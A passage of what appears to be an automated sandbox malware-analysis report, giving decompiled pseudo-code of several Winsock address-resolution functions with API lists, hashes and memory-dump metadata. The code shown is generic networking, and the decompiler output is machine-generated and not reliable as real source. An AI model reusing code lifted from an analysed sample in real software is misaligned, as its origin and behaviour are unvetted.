				if(_v8 == 0 && _v12 != 0) {
					E00402C3C( *((intOrPtr*)(_v12 + 0x18)),  *((intOrPtr*)(_v12 + 0x10)), _t97);
				}
				_pop(_t85);
				 *[fs:eax] = _t85;
				_push(E00428437);
				if(_v12 != 0) {
					return  *0x46afb0(_v12);
				}
				return 0;
			}














                                                          0x004282ec
                                                          0x004282ff
                                                          0x00428301
                                                          0x00428303
                                                          0x00428305
                                                          0x0042830a
                                                          0x0042830f
                                                          0x00428310
                                                          0x00428315
                                                          0x00428318
                                                          0x00428324
                                                          0x0042832d
                                                          0x00428360
                                                          0x00428365
                                                          0x00428375
                                                          0x00428375
                                                          0x00428394
                                                          0x00428367
                                                          0x0042836e
                                                          0x00428373
                                                          0x004283a0
                                                          0x004283a5
                                                          0x004283b5
                                                          0x004283cd
                                                          0x004283a7
                                                          0x004283ae
                                                          0x004283b3
                                                          0x004283f0
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x004283b3
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00428373
                                                          0x0042832f
                                                          0x00428331
                                                          0x00428336
                                                          0x00428351
                                                          0x00428351
                                                          0x004283f7
                                                          0x0042840d
                                                          0x0042840d
                                                          0x00428414
                                                          0x00428417
                                                          0x0042841a
                                                          0x00428423
                                                          0x00000000
                                                          0x00428429
                                                          0x0042842f

                                                          APIs
                                                          • getaddrinfo.WS2_32(00000000,00000000,?,?), ref: 0042834B
                                                          • getaddrinfo.WS2_32(00000000,00000000,00000001,?), ref: 0042838E
                                                          • FreeAddrInfoW.WS2_32(00000000), ref: 00428429
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.613706650.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_400000_cmd.jbxd
                                                          Similarity
                                                          • API ID: getaddrinfo$AddrFreeInfo
                                                          • String ID: 0.0.0.0$127.0.0.1$::0$::1
                                                          • API String ID: 3931047987-1239866159
                                                          • Opcode ID: f13852d0eed7c319d3b1ff1539600db7db8f600b511e1b08b845160029669dde
                                                          • Instruction ID: 6e1e9209b9389df747cca7469056b7c946e14813f35791b24d7de859d8929a54
                                                          • Opcode Fuzzy Hash: f13852d0eed7c319d3b1ff1539600db7db8f600b511e1b08b845160029669dde
                                                          • Instruction Fuzzy Hash: F54171B1B01118AFDB00EFA9D844ADFBAB8EB48300F90447BF501F3641EB789944CB69
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 004287FC Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 218networkCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 48%
                                                          			E004287FC(char __eax, void* __ebx, intOrPtr __ecx, void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr* _a4, intOrPtr _a8) {
				char _v8;
				char _v12;
				intOrPtr _v16;
				char _v20;
				char _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				char _v40;
				void* _v41;
				void* _v42;
				void* _v43;
				intOrPtr _v44;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				char _v76;
				char _v80;
				intOrPtr _v84;
				char _v88;
				intOrPtr _v92;
				char _v96;
				intOrPtr _v100;
				char _v104;
				char _v108;
				void* _t174;
				void* _t175;
				signed int _t176;
				intOrPtr _t193;
				intOrPtr _t200;
				intOrPtr _t203;
				intOrPtr _t209;
				intOrPtr* _t212;
				void* _t213;
				void* _t214;
				void* _t215;
				intOrPtr _t216;

				_t214 = _t215;
				_t216 = _t215 + 0xffffff98;
				_v20 = 0;
				_v24 = 0;
				_v40 = 0;
				_t209 = __ecx;
				_t174 = __edx;
				_v8 = __eax;
				E004049CC(_v8);
				 *[fs:eax] = _t216;
				 *((intOrPtr*)( *_a4 + 0x44))( *[fs:eax], 0x428a8d, _t214, __edi, __esi, __ebx, _t213);
				if(E004282D0(_t174) != 0) {
					_v12 = 0;
					_push(_t214);
					_push(0x428a42);
					_push( *[fs:eax]);
					 *[fs:eax] = _t216;
					L00403114( &_v76, 0x20);
					_v72 = 0;
					_v68 = _a8;
					_v64 = _t209;
					_v76 = 0;
					_push( &_v12);
					_push( &_v76);
					_push(0);
					_push(E004049DC(_v8));
					if( *0x46afac() == 0) {
						_v16 = _v12;
						while(_v16 != 0) {
							if(_t174 != 0x17 ||  *((intOrPtr*)(_v16 + 4)) != 2) {
								if(_t174 != 2 ||  *((intOrPtr*)(_v16 + 4)) != 0x17) {
									_v28 = 0x20;
									E00404B0C( &_v20, 0x401);
									E00404B0C( &_v24, _v28);
									_push(0xa);
									_push(_v28);
									_push(E004049DC(_v24));
									_push(0x401);
									_push(E004049DC(_v20));
									_push( *((intOrPtr*)(_v16 + 0x10)));
									_push( *((intOrPtr*)(_v16 + 0x18)));
									if( *0x46afb4() == 0) {
										E004046F8( &_v20, E004049DC(_v20));
										 *((intOrPtr*)( *_a4 + 0x38))();
									}
								}
							}
							_v16 =  *((intOrPtr*)(_v16 + 0x1c));
						}
					}
					_pop(_t193);
					 *[fs:eax] = _t193;
					_push(0x428a49);
					if(_v12 != 0) {
						return  *0x46afb0(_v12);
					}
					return 0;
				} else {
					_t175 = E004049DC(_v8);
					_push(_t175);
					if( *0x46af80() + 1 != 0) {
						 *((intOrPtr*)( *_a4 + 0x38))();
						if( *((intOrPtr*)( *_a4 + 0x14))() == 0) {
							 *((intOrPtr*)( *_a4 + 0x38))();
						}
						_pop(_t200);
						 *[fs:eax] = _t200;
						_push(0x428a94);
						E00404500( &_v40);
						E00404524( &_v24, 2);
						return E00404500( &_v8);
					} else {
						E0042805C( *0x4708dc);
						 *[fs:eax] = _t216;
						 *0x46af44(_t175,  *[fs:eax], 0x42890a, _t214);
						_v32 = 0;
						if(_v32 != 0) {
							_v36 =  *((intOrPtr*)(_v32 + 0xc));
							_t176 = 0;
							while(1) {
								_t212 =  *((intOrPtr*)(_v36 + _t176 * 4));
								if(_t212 == 0) {
									goto L6;
								}
								_v44 =  *_t212;
								_v108 = 0;
								_v104 = 0;
								_v100 = 0;
								_v96 = 0;
								_v92 = 0;
								_v88 = 0;
								_v84 = 0;
								_v80 = 0;
								L004093FC("%d.%d.%d.%d", 3,  &_v108,  &_v40);
								 *((intOrPtr*)( *_a4 + 0x38))();
								_t176 = _t176 + 1;
							}
						}
						L6:
						_pop(_t203);
						 *[fs:eax] = _t203;
						_push(0x428a49);
						return E00428064( *0x4708dc);
					}
				}
			}








































                                                          0x004287fd
                                                          0x004287ff
                                                          0x00428807
                                                          0x0042880a
                                                          0x0042880d
                                                          0x00428810
                                                          0x00428812
                                                          0x00428814
                                                          0x0042881a
                                                          0x0042882a
                                                          0x00428832
                                                          0x0042883e
                                                          0x00428923
                                                          0x00428928
                                                          0x00428929
                                                          0x0042892e
                                                          0x00428931
                                                          0x0042893e
                                                          0x00428945
                                                          0x0042894b
                                                          0x0042894e
                                                          0x00428953
                                                          0x00428959
                                                          0x0042895d
                                                          0x0042895e
                                                          0x00428968
                                                          0x00428973
                                                          0x0042897c
                                                          0x00428a1a
                                                          0x00428987
                                                          0x00428995
                                                          0x004289a5
                                                          0x004289b1
                                                          0x004289bc
                                                          0x004289c1
                                                          0x004289c6
                                                          0x004289cf
                                                          0x004289d0
                                                          0x004289d9
                                                          0x004289e0
                                                          0x004289e7
                                                          0x004289f2
                                                          0x00428a01
                                                          0x00428a0e
                                                          0x00428a0e
                                                          0x004289f2
                                                          0x00428995
                                                          0x00428a17
                                                          0x00428a17
                                                          0x00428a1a
                                                          0x00428a26
                                                          0x00428a29
                                                          0x00428a2c
                                                          0x00428a35
                                                          0x00000000
                                                          0x00428a3b
                                                          0x00428a41
                                                          0x00428844
                                                          0x0042884c
                                                          0x0042884e
                                                          0x00428856
                                                          0x00428919
                                                          0x00428a53
                                                          0x00428a5f
                                                          0x00428a5f
                                                          0x00428a64
                                                          0x00428a67
                                                          0x00428a6a
                                                          0x00428a72
                                                          0x00428a7f
                                                          0x00428a8c
                                                          0x0042885c
                                                          0x00428861
                                                          0x00428871
                                                          0x00428875
                                                          0x0042887b
                                                          0x00428882
                                                          0x0042888a
                                                          0x0042888d
                                                          0x004288e8
                                                          0x004288eb
                                                          0x004288f0
                                                          0x00000000
                                                          0x00000000
                                                          0x00428893
                                                          0x0042889f
                                                          0x004288a2
                                                          0x004288ab
                                                          0x004288ae
                                                          0x004288b7
                                                          0x004288ba
                                                          0x004288c3
                                                          0x004288c6
                                                          0x004288d7
                                                          0x004288e4
                                                          0x004288e7
                                                          0x004288e7
                                                          0x004288e8
                                                          0x004288f2
                                                          0x004288f4
                                                          0x004288f7
                                                          0x004288fa
                                                          0x00428909
                                                          0x00428909
                                                          0x00428856

                                                          APIs
                                                          • inet_addr.WS2_32(00000000), ref: 0042884F
                                                          • gethostbyname.WS2_32(00000000), ref: 00428875
                                                          • getaddrinfo.WS2_32(00000000,00000000,?,?), ref: 00428969
                                                          • FreeAddrInfoW.WS2_32(00000000), ref: 00428A3B
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.613706650.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_400000_cmd.jbxd
                                                          Similarity
                                                          • API ID: AddrFreeInfogetaddrinfogethostbynameinet_addr
                                                          • String ID: $%d.%d.%d.%d$0.0.0.0
                                                          • API String ID: 2886313179-1131994233
                                                          • Opcode ID: adbdb7855e5e8b6d5f1d4913bd586f5d75273ba707ff385d4251d0a6a012952d
                                                          • Instruction ID: af6fb9e9a92a67624a5747da6f0d21091b3994723e0146836a6ab0704b51f165
                                                          • Opcode Fuzzy Hash: adbdb7855e5e8b6d5f1d4913bd586f5d75273ba707ff385d4251d0a6a012952d
                                                          • Instruction Fuzzy Hash: B9813AB4A012189FCB10DFA9D885AAEBBF4FF49300F90846AE904E7351DB389D41CF65
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00428480 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 173networkCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 54%
                                                          			E00428480(void* __eax, void* __ebx, char __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags, char _a4, intOrPtr _a8, intOrPtr _a12, void* _a16) {
				intOrPtr _v8;
				char _v12;
				void* _v16;
				intOrPtr* _v20;
				intOrPtr _v24;
				void* _v28;
				char _v29;
				intOrPtr _v52;
				intOrPtr _v56;
				void* _v60;
				char _v64;
				intOrPtr _v84;
				intOrPtr _v88;
				void* _v92;
				char _v96;
				char _v124;
				void _v152;
				intOrPtr _t80;
				void* _t84;
				void* _t90;
				void* _t125;
				intOrPtr _t146;
				intOrPtr _t150;
				intOrPtr _t154;
				void* _t157;
				void* _t161;
				void* _t163;
				void* _t164;
				intOrPtr _t166;
				void* _t169;
				void* _t170;
				intOrPtr _t171;
				intOrPtr _t178;

				_t169 = _t170;
				_t171 = _t170 + 0xffffff6c;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_v12 = __ecx;
				_v8 = __edx;
				_t125 = __eax;
				_t154 = _a12;
				_t163 = _a16;
				E004049CC(_v8);
				E004049CC(_v12);
				_push(_t169);
				_push(0x4286ac);
				_push( *[fs:eax]);
				 *[fs:eax] = _t171;
				_v16 = 0;
				L00403114(_t125, 0x1c);
				if(E004282D0(_t163) != 0) {
					L00403114( &_v64, 0x20);
					L00403114( &_v96, 0x20);
					_v29 = 0;
					__eflags = _t163;
					if(__eflags != 0) {
						_v60 = _t163;
					} else {
						__eflags = _a4;
						if(__eflags == 0) {
							_v92 = 2;
							_v60 = 0x17;
							_v29 = 1;
						} else {
							_v60 = 2;
							_v92 = 0x17;
							_v29 = 1;
						}
					}
					_v56 = _a8;
					_t80 = _t154;
					_v52 = _t80;
					_v88 = _v56;
					_v84 = _t80;
					_v16 = E004282EC(_t125,  &_v64, _v12, _t154, _t163, __eflags,  &_v124);
					_t164 =  &_v124;
					_t84 = memcpy(_t125, _t164, 7 << 2);
					_t157 = _t164 + 0xe;
					__eflags = _t84;
					if(_t84 != 0) {
						__eflags = _v29;
						if(__eflags != 0) {
							_t90 = E004282EC(_t125,  &_v96, _v12, _t157, _t164, __eflags,  &_v152);
							_v16 = _t90;
							__eflags = _t90;
							if(_t90 == 0) {
								memcpy(_t125,  &_v152, 7 << 2);
							}
						}
					}
					__eflags = 0;
					_pop(_t146);
					 *[fs:eax] = _t146;
					_push(E004286B3);
					return E00404524( &_v12, 2);
				} else {
					E0042805C( *0x4708dc);
					 *[fs:eax] = _t171;
					 *_t125 = 2;
					 *0x46af40(_t154,  *[fs:eax], 0x4285c9, _t169);
					_v20 = 0;
					_v24 = 0;
					_t176 = _v20;
					if(_v20 != 0 && E00408688(0, 0xffffffffffffffff, _t176) + 1 == 0) {
						_v24 =  *0x46af34(E004049DC(_v12),  *_v20);
					}
					_t178 = _v24;
					if(_t178 != 0) {
						 *((short*)(_t125 + 2)) =  *((intOrPtr*)(_v24 + 8));
					} else {
						 *((short*)(_t125 + 2)) =  *0x46af84(E00408688(0, 0, _t178));
					}
					E00404928(_v8, "255.255.255.255");
					if(_t178 != 0) {
						_t161 = E004049DC(_v8);
						_t166 =  *0x46af80(_t161);
						 *((intOrPtr*)(_t125 + 4)) = _t166;
						__eflags = _t166 + 1;
						if(_t166 + 1 == 0) {
							_v28 =  *0x46af44(_t161);
							_v16 =  *0x46af30();
							__eflags = _v28;
							if(_v28 != 0) {
								 *((intOrPtr*)(_t125 + 4)) =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v28 + 0xc))))));
							}
						}
					} else {
						 *((intOrPtr*)(_t125 + 4)) = 0xffffffff;
					}
					_pop(_t150);
					 *[fs:eax] = _t150;
					_push(E00428691);
					return E00428064( *0x4708dc);
				}
			}




































                                                          0x00428481
                                                          0x00428483
                                                          0x00428489
                                                          0x0042848a
                                                          0x0042848b
                                                          0x0042848c
                                                          0x0042848f
                                                          0x00428492
                                                          0x00428494
                                                          0x00428497
                                                          0x0042849d
                                                          0x004284a5
                                                          0x004284ac
                                                          0x004284ad
                                                          0x004284b2
                                                          0x004284b5
                                                          0x004284ba
                                                          0x004284c6
                                                          0x004284d4
                                                          0x004285da
                                                          0x004285e9
                                                          0x004285ee
                                                          0x004285f2
                                                          0x004285f4
                                                          0x00428624
                                                          0x004285f6
                                                          0x004285f6
                                                          0x004285fa
                                                          0x00428610
                                                          0x00428617
                                                          0x0042861e
                                                          0x004285fc
                                                          0x004285fc
                                                          0x00428603
                                                          0x0042860a
                                                          0x0042860a
                                                          0x004285fa
                                                          0x0042862a
                                                          0x0042862d
                                                          0x0042862f
                                                          0x00428635
                                                          0x00428638
                                                          0x0042864d
                                                          0x00428652
                                                          0x0042865a
                                                          0x0042865a
                                                          0x0042865c
                                                          0x0042865e
                                                          0x00428660
                                                          0x00428664
                                                          0x00428676
                                                          0x0042867b
                                                          0x0042867e
                                                          0x00428680
                                                          0x0042868f
                                                          0x0042868f
                                                          0x00428680
                                                          0x00428664
                                                          0x00428691
                                                          0x00428693
                                                          0x00428696
                                                          0x00428699
                                                          0x004286ab
                                                          0x004284da
                                                          0x004284df
                                                          0x004284ef
                                                          0x004284f2
                                                          0x004284f8
                                                          0x004284fe
                                                          0x00428503
                                                          0x00428506
                                                          0x0042850a
                                                          0x0042852f
                                                          0x0042852f
                                                          0x00428532
                                                          0x00428536
                                                          0x00428556
                                                          0x00428538
                                                          0x00428549
                                                          0x00428549
                                                          0x00428562
                                                          0x00428567
                                                          0x0042857a
                                                          0x00428583
                                                          0x00428585
                                                          0x00428588
                                                          0x00428589
                                                          0x00428592
                                                          0x0042859b
                                                          0x0042859e
                                                          0x004285a2
                                                          0x004285ae
                                                          0x004285ae
                                                          0x004285a2
                                                          0x00428569
                                                          0x00428569
                                                          0x00428569
                                                          0x004285b3
                                                          0x004285b6
                                                          0x004285b9
                                                          0x004285c8
                                                          0x004285c8

                                                          APIs
                                                          • getprotobynumber.WS2_32(00000000), ref: 004284F8
                                                          • getservbyname.WS2_32(00000000,?), ref: 00428529
                                                          • htons.WS2_32(00000000), ref: 00428543
                                                          • inet_addr.WS2_32(00000000), ref: 0042857D
                                                          • gethostbyname.WS2_32(00000000), ref: 0042858C
                                                          • WSAGetLastError.WS2_32(?,00000000,004286AC,?,?,?,?,?,0042C70A,00450460,00000000,?,?,00000000,?,00000000), ref: 00428595
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.613706650.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_400000_cmd.jbxd
                                                          Similarity
                                                          • API ID: ErrorLastgethostbynamegetprotobynumbergetservbynamehtonsinet_addr
                                                          • String ID: 255.255.255.255
                                                          • API String ID: 1512579943-2422070025
                                                          • Opcode ID: 69bf8126dd49c273e8caeab2d162fdc2ab9d5d1529d8cc1c0f570dd5bb3e6544
                                                          • Instruction ID: e0f867c82261a1ad1d64ef2b8e5d84a6cce8a1ee9ccc3a6e3b2a6ba982d300ba
                                                          • Opcode Fuzzy Hash: 69bf8126dd49c273e8caeab2d162fdc2ab9d5d1529d8cc1c0f570dd5bb3e6544
                                                          • Instruction Fuzzy Hash: 40616EB0A01218DFDB10DFA8D845A9EBBF4EF48314F51806EE805A7391DB789E41CB59
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00428AC4 Relevance: 10.6, APIs: 7, Instructions: 123networkCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 25%
                                                          			E00428AC4(intOrPtr __eax, void* __ebx, intOrPtr __ecx, void* __edx, void* __esi, void* __eflags, intOrPtr _a4) {
				intOrPtr _v8;
				short _v10;
				intOrPtr* _v16;
				intOrPtr _v20;
				char _v24;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				char _v56;
				intOrPtr _t56;
				intOrPtr _t60;
				intOrPtr _t61;
				intOrPtr _t99;
				intOrPtr _t100;
				void* _t103;
				void* _t105;
				void* _t106;
				intOrPtr _t107;

				_t90 = __ecx;
				_t105 = _t106;
				_t107 = _t106 + 0xffffffcc;
				_t89 = __ecx;
				_t103 = __edx;
				_v8 = __eax;
				E004049CC(_v8);
				_push(_t105);
				_push(0x428c5b);
				_push( *[fs:eax]);
				 *[fs:eax] = _t107;
				_v10 = 0;
				if(E004282D0(_t103) != 0) {
					_v24 = 0;
					 *[fs:edx] = _t107;
					L00403114( &_v56, 0x20);
					_v52 = 0;
					_v48 = _a4;
					_v44 = _t89;
					_v56 = 1;
					_t56 =  *0x46afac(0, E004049DC(_v8),  &_v56,  &_v24,  *[fs:edx], 0x428c3e, _t105);
					__eflags = _t56;
					if(_t56 == 0) {
						__eflags = _v24;
						if(_v24 != 0) {
							_t60 = _v24;
							__eflags =  *((intOrPtr*)(_t60 + 4)) - 2;
							if( *((intOrPtr*)(_t60 + 4)) == 2) {
								_v10 =  *0x46af84( *((intOrPtr*)( *((intOrPtr*)(_v24 + 0x18)) + 2)));
							}
							_t61 = _v24;
							__eflags =  *((intOrPtr*)(_t61 + 4)) - 0x17;
							if( *((intOrPtr*)(_t61 + 4)) == 0x17) {
								_v10 =  *0x46af84( *((intOrPtr*)( *((intOrPtr*)(_v24 + 0x18)) + 2)));
							}
						}
					}
					_pop(_t99);
					 *[fs:eax] = _t99;
					_push(0x428c45);
					__eflags = _v24;
					if(_v24 != 0) {
						return  *0x46afb0(_v24);
					}
					return 0;
				} else {
					E0042805C( *0x4708dc);
					 *[fs:eax] = _t107;
					 *0x46af40(__ecx,  *[fs:eax], 0x428b83, _t105);
					_v16 = 0;
					_v20 = 0;
					if(_v16 != 0) {
						_v20 =  *0x46af34(E004049DC(_v8),  *_v16);
					}
					_t111 = _v20;
					if(_v20 != 0) {
						_v10 =  *0x46af84( *((intOrPtr*)(_v20 + 8)));
					} else {
						_v10 = E00408688(_t90, 0, _t111);
					}
					_pop(_t100);
					 *[fs:eax] = _t100;
					_push(0x428c45);
					return E00428064( *0x4708dc);
				}
			}





















                                                          0x00428ac4
                                                          0x00428ac5
                                                          0x00428ac7
                                                          0x00428acc
                                                          0x00428ace
                                                          0x00428ad0
                                                          0x00428ad6
                                                          0x00428add
                                                          0x00428ade
                                                          0x00428ae3
                                                          0x00428ae6
                                                          0x00428ae9
                                                          0x00428af8
                                                          0x00428b8c
                                                          0x00428b9a
                                                          0x00428ba7
                                                          0x00428bae
                                                          0x00428bb4
                                                          0x00428bb7
                                                          0x00428bba
                                                          0x00428bd4
                                                          0x00428bda
                                                          0x00428bdc
                                                          0x00428bde
                                                          0x00428be2
                                                          0x00428be4
                                                          0x00428be7
                                                          0x00428beb
                                                          0x00428bfe
                                                          0x00428bfe
                                                          0x00428c02
                                                          0x00428c05
                                                          0x00428c09
                                                          0x00428c1c
                                                          0x00428c1c
                                                          0x00428c09
                                                          0x00428be2
                                                          0x00428c22
                                                          0x00428c25
                                                          0x00428c28
                                                          0x00428c2d
                                                          0x00428c31
                                                          0x00000000
                                                          0x00428c37
                                                          0x00428c3d
                                                          0x00428afe
                                                          0x00428b03
                                                          0x00428b13
                                                          0x00428b17
                                                          0x00428b1d
                                                          0x00428b22
                                                          0x00428b29
                                                          0x00428b40
                                                          0x00428b40
                                                          0x00428b43
                                                          0x00428b47
                                                          0x00428b67
                                                          0x00428b49
                                                          0x00428b53
                                                          0x00428b53
                                                          0x00428b6d
                                                          0x00428b70
                                                          0x00428b73
                                                          0x00428b82
                                                          0x00428b82

                                                          APIs
                                                          • getprotobynumber.WS2_32 ref: 00428B17
                                                          • getservbyname.WS2_32(00000000,?), ref: 00428B3A
                                                          • htons.WS2_32(?), ref: 00428B61
                                                          • getaddrinfo.WS2_32(00000000,00000000,00000001,?), ref: 00428BD4
                                                          • htons.WS2_32(?), ref: 00428BF8
                                                          • htons.WS2_32(?), ref: 00428C16
                                                          • FreeAddrInfoW.WS2_32(00000000), ref: 00428C37
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.613706650.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_400000_cmd.jbxd
                                                          Similarity
                                                          • API ID: htons$AddrFreeInfogetaddrinfogetprotobynumbergetservbyname
                                                          • String ID:
                                                          • API String ID: 1097464056-0
                                                          • Opcode ID: ac2a11e55bccbab7bf93bd81ed185ae8c57234f38b9f9a06c2540bd8b9c1855b
                                                          • Instruction ID: bc0b1e3f7fe3b0363850202feb9de7119bd4d1467b0015dac942d594976a0245
                                                          • Opcode Fuzzy Hash: ac2a11e55bccbab7bf93bd81ed185ae8c57234f38b9f9a06c2540bd8b9c1855b
                                                          • Instruction Fuzzy Hash: 4D412EB4A01618EFDB04DFA5E945A9EBBF9FF08300F51446AF404E7251DB789E00CB6A
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%